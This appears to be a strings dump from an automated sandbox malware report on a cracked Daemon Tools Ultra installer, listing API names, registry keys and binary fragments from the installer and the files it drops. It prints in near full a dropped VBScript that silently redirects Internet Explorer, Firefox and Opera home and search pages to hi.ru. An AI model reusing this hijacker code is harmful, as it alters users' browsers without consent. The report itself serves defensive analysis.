Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

oem<.inf

Unicode based on Runtime Data (dtinst.exe )

ointer

Ansi based on Runtime Data (HiRu.exe )

ole device

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ole32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OLEAUT32.DLL

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

OleInitialize

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OLESelfRegister

Unicode based on Dropped File (JSSys3.dll.204366558)

OleUninitialize

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

olnnh^W:>[bjnnljkm

Ansi based on Dropped File (Uninstall.exe.212096218)

ols Image Engine

Unicode based on Dropped File (imgengine.dll.62529018)

ommand

Unicode based on Dropped File (JSSys3.dll.204366558)

on@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allo

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

OnBack

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

OnChange

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

OnClick

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

onE8WD-Hz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

onFace

Unicode based on Dropped File (JSSys3.dll.204366558)

OnNotify

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

onText

Unicode based on Dropped File (JSSys3.dll.204366558)

OO i|@2R`/u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OOBEInProgress

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ooKNHG>A;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ools Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ools Virtual USB Bus

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

oooNOEC;!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Open File

Unicode based on Dropped File (JSSys3.dll.204366558)

OpenClipboard

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OpenDlg

Ansi based on Dropped File (JSSys3.dll.204366558)

OpenMultiDlg

Ansi based on Dropped File (JSSys3.dll.204366558)

OpenProcess

Ansi based on Dropped File (JSSys3.dll.204366558)

OpenProcessToken

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OpenSCManagerW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

OpenServiceW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

operacheck = 1

Ansi based on Dropped File (start72urez3kr.vbs)

Ops:GetPEFile

Unicode based on Dropped File (JSSys3.dll.204366558)

Option Explicit

Ansi based on Dropped File (start72urez3kr.vbs)

Option ExplicitConst HKEY_CURRENT_USER = &H80000001Const HKEY_LOCAL_MACHINE = &H80000002Const ForReading = 1Const ForWriting = 2Const ForAppending = 8Const strHomePage = "http://hi.ru/?10"Const strSearch = "http://hi.ru/search/?q={sear

Ansi based on Runtime Data (ChangeStartPage.exe )

Option ExplicitConst HKEY_CURRENT_USER = &H80000001Const HKEY_LOCAL_MACHINE = &H80000002Const ForReading = 1Const ForWriting = 2Const ForAppending = 8Const strHomePage = "http://hi.ru/?10"Const strSearch = "http://hi.ru/search/?q={searchTerms}"Const nomerchrome = "4"Dim strComputerDim objSWbemLocatorDim objSWbemServicesExDim objSWbemObjectExDim objFSODim objINIEditSet objSWbemLocator = WScript.CreateObject("WbemScripting.SWbemLocator")Set objSWbemServicesEx = objSWbemLocator.ConnectServer(strComputer, "root\default")Set objSWbemObjectEx = objSWbemServicesEx.Get("StdRegProv")Set objFSO = WScript.CreateObject("Scripting.FileSystemObject")Set objINIEdit = WScript.CreateObject("JSSys3.INIEdit")Dim iecheckDim firefoxcheckDim operacheckDim chromecheckDim amigocheckChangeIEHomePageChangeFirefoxHomePageChangeOperaHomePageChangeIESearchPageSet objINIEdit = NothingSet objFSO = NothingSet objSWbemObjectEx = NothingSet objSWbemServicesEx = NothingSet objSWbemLocator = NothingWScript.Quit 0'=============================================================================Function PRG_Isx64 if lcase(gWShell.Environment("SYSTEM")("Processor_Architecture")) = "amd64" Then PRG_Isx64 = True else PRG_Isx64 = False End ifEnd Function'=============================================================================Sub ChangeIEHomePage()If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Start Page", strHomePage) = 0 Then iecheck = 1'WScript.Echo "Internet Explorer home page set succesfully"Else'WScript.Echo "Can't set Internet Explorer home page"End IfEnd Sub'=============================================================================Sub ChangeIESearchPage()If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Search Page", strSearch) = 0 Then'WScript.Echo "Internet Explorer search page set succesfully"Else'WScript.Echo "Can't set Internet Explorer search page"End IfEnd Sub'=============================================================================Sub ChangeFirefoxHomePage()Dim strCurrentVersionDim strProfilesFileNameDim boolFoundDim strSectionDim strProfilePathDim strPrefsPathDim objRegExp_HomePageDim strContentIf objSWbemObjectEx.GetStringValue(HKEY_LOCAL_MACHINE, "SOFTWARE\Mozilla\Mozilla Firefox", "CurrentVersion", strCurrentVersion) = 0 ThenstrProfilesFileName = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Mozilla\Firefox\profiles.ini"If objFSO.FileExists(strProfilesFileName) ThenboolFound = FalseFor Each strSection In Split(objINIEdit.GetIniSectionNames(strProfilesFileName), vbNullChar)If objINIEdit.GetIniVal(strProfilesFileName, strSection, "Default") = "1" ThenboolFound = TrueExit ForEnd IfNextIf Not boolFound ThenstrSection = "Profile0"End IfSelect Case objINIEdit.GetIniVal(strProfilesFileName, strSection, "IsRelative")Case "0"strProfilePath = objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path")Case "1"strProfilePath = objFSO.BuildPath(objFSO.GetParentFolderName(strProfilesFileName), objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path"))Case Else'WScript.Echo "Can't find Firefox default profile"Exit SubEnd SelectstrPrefsPath = objFSO.BuildPath(strProfilePath, "prefs.js")If objFSO.FileExists(strPrefsPath) ThenSet objRegExp_HomePage = WScript.CreateObject("VBScript.RegExp")With objRegExp_HomePage.Global = False.IgnoreCase = True.Pattern = "(user_pref\(""browser\.startup\.homepage"", )(.*)(\);)"End WithWith objFSO.OpenTextFile(strPrefsPath, ForReading)strContent = .ReadAll().CloseEnd WithIf objRegExp_HomePage.Test(strContent) ThenWith objFSO.OpenTextFile(strPrefsPath, ForWriting).Write objRegExp_HomePage.Replace(strContent, "$1""" & strHomePage & """$3").CloseEnd WithElseWith objFSO.OpenTextFile(strPrefsPath, ForAppending).WriteLine "user_pref(""browser.startup.homepage"", """ & strHomePage & """);".CloseEnd WithEnd IfSet objRegExp_HomePage = Nothingfirefoxcheck = 1'WScript.Echo "Firefox home page set succesfully"Else'WScript.Echo "Can't find Firefox preference file [" & strPrefsPath & "]"End IfElse'WScript.Echo "Can't find Firefox profiles file [" & strProfilesFileName & "]"End IfElse'WScript.Echo "Can't find Mozilla Firefox"End IfEnd Sub'=============================================================================Sub ChangeOperaHomePage()Dim strPrefsPathstrPrefsPath = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Opera\Opera\operaprefs.ini"If objFSO.FileExists(strPrefsPath) ThenIf objINIEdit.WriteIniVal(strPrefsPath, "User Prefs", "Home URL", strHomePage) Thenoperacheck = 1'WScript.Echo "Opera home page set succesfully"Else'WScript.Echo "Can't set Opera home page"End IfElse'WScript.Echo "Can't find Opera preference file [" & strPrefsPath & "]"End IfEnd Sub

Ansi based on Dropped File (start72urez3kr.vbs)

or>O@ld7U4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OriginalFilename

Unicode based on Dropped File (JSSys3.dll.204366558)

ot enough space for environment

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ov$9sBd&a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

OW$Bl&|B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

owBackground

Unicode based on Dropped File (JSSys3.dll.204366558)

owKdJRVc)P

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

o{WEAa!F|{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O|t<y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P NX"YsQ))/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P$AS9GKI'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p$pa^xg1<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P%%9FTY3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P,YC;JM.[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P-I7f+D~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p..@KmoQZ!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P.u}aCSAB

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P=HoN%2)O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p]D\J^@Ry

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PageAllocatorSystemHeapIsPrivate

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PageAllocatorUseSystemHeap

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

parentCID

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ParentFolder

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ParsingName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

pAS-|Ymah$'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PAYLOAD

Ansi based on Image Processing (screen_0.png)

pb)h{O,um

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Pbb``b```f`aiffhlhk

(Video) Automated Malware Analysis in the Cloud

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pBL?bh_'b

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PD9-z2m$N}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PE file description string.

Ansi based on Dropped File (JSSys3.dll.204366558)

PE file filename.

Ansi based on Dropped File (JSSys3.dll.204366558)

PE file filename.W%

Ansi based on Dropped File (JSSys3.dll.204366558)

PE file version.

Ansi based on Dropped File (JSSys3.dll.204366558)

PE file version.WW+

Ansi based on Dropped File (JSSys3.dll.204366558)

pe]l;2B[_z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PEDH%W#b

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PeekMessageA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

PeekMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PeekNamedPipe

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

PEFile

Ansi based on Dropped File (JSSys3.dll.204366558)

Personal

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

pf5j'~

Ansi based on Dropped File (imgengine.dll.62529018)

pfWu?J-rQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ph$zK

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

pHBE[w1P=}hK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PinToNameSpaceTree

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

pkicKI??====

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pkiIH?E>==:>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pKNFE>;;::

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Plane1

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane10

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane11

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane12

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane13

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane14

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane15

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane16

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane2

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane3

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane4

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane5

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane6

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane7

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane8

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Plane9

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Play a .WAV file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Play a .WAV file.W'

Ansi based on Dropped File (JSSys3.dll.204366558)

PlayWav

Ansi based on Dropped File (JSSys3.dll.204366558)

PlayWavW

Ansi based on Dropped File (JSSys3.dll.204366558)

Please wait while Setup is loading...

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Pn0tdU",ks

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PnPDriverImportError

Unicode based on Runtime Data (dtinst.exe )

POH@wn@A<ijg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Policy

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

POOKOPOOP```edhql

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PortUseAuth

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PostMessageA

Ansi based on Dropped File (JSSys3.dll.204366558)

PostQuitMessage

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PQ^VKTNKM7K-YZ]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PQj-`_v~f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PQXQ+gnB@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PreCreate

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PreferExternalManifest

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PreferredUILanguages

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PRG_Isx64 = False

Ansi based on Dropped File (start72urez3kr.vbs)

PRG_Isx64 = True

Ansi based on Dropped File (start72urez3kr.vbs)

Print

Unicode based on Dropped File (JSSys3.dll.204366558)

Print a file with default program.

Ansi based on Dropped File (JSSys3.dll.204366558)

PrintFile

Ansi based on Dropped File (JSSys3.dll.204366558)

PrintFileWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

PrivateKeyLifetimeSeconds

Unicode based on Runtime Data (dtinst.exe )

PrivKeyCacheMaxItems

Unicode based on Runtime Data (dtinst.exe )

PrivKeyCachePurgeIntervalSeconds

Unicode based on Runtime Data (dtinst.exe )

Process32First

Ansi based on Dropped File (JSSys3.dll.204366558)

Process32Next

Ansi based on Dropped File (JSSys3.dll.204366558)

ProductName

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ProductVersion

Unicode based on Dropped File (Tages.dll.423655889)

ProfileImagePath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProfilesDirectory

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

program files

Unicode based on Runtime Data (dtinst.exe )

Program Files

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProgramData

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProgramFilesDir

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Programs

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Provider = %Vendor%

Ansi based on Dropped File (SET4F37.tmp)

ProxyBypass

Unicode based on Runtime Data (DiscSoftBusService.exe )

ProxyHost

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProxyPassword

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProxyPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProxyUse

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProxyUser

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PSAPI.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

pSetupGetRealSystemTime

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ption

Unicode based on Dropped File (JSSys3.dll.204366558)

PU3gAp;=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Public

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Publisher

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

PublishExpandedPath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

px~4D;5w

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Pyr;YuNgy)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PYS_^a&<m_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p{;X!6mzA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p}$Xe2~y9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Q'LY3ox{L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Q'YZj<v*9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

q*qd';i,A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

q-7v(rrg)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

q6vCLSIDWW

Ansi based on Dropped File (JSSys3.dll.204366558)

q;-dJeVS}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

q`n^-robw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qax~%Mx*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qe&:uf@yk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qebdob`oifmoai

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qer5X!cKs

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qey{MDnN V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qg4+x\o*#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QK xZ]LQlK{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QK1*4nj)p[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qLgN%Rg,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qoEE;>::

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qpoljloqqqpp

Ansi based on Dropped File (Uninstall.exe.212096218)

QPQQOPcP`ee`j

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QQ`be``ea`hjafqffqjkl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Qqi7s(k51

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QQP`PO````aaaflkk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QueryForInfoTip

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

QueryForOverlay

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

QueryPerformanceCounter

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

QueryServiceStatus

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

QueuePesterInterval

Unicode based on Runtime Data (dtinst.exe )

qvJs/&UnP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QWePe\`boea

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QWQOW\Oe^bb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Q}@I:+O2MM5xn.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Q~mbFYIuN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R tL%F4vC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R$"/Fu3&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r$ocxv"SX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R)vG` ;?+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R. duoVGa

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r1-sq?-[C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R2`ul]#+3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R4"H[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r4`ZIGk4'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R5:Rmn|LiJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R7#@p

Ansi based on Dropped File (Uninstall.exe.212096218)

R8g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r8{.S3Y%A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

R:?^mdDs

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r@ATL@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

r^ Y/A%]V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rack-ADMIN@CRACK]

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

RamDisc:

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

RamSize

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ranslation

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RC]5H%R0p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rcmpiA

Ansi based on Dropped File (ChangeStartPage.exe.518705032)

Read part or all of an ADS file as text.

Ansi based on Dropped File (JSSys3.dll.204366558)

ReadFile

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

ReadStream

Ansi based on Dropped File (JSSys3.dll.204366558)

RegCloseKey

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegCreateKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegCreateKeyExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegCreateKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegCreateKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegDeleteKeyA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegDeleteKeyExA

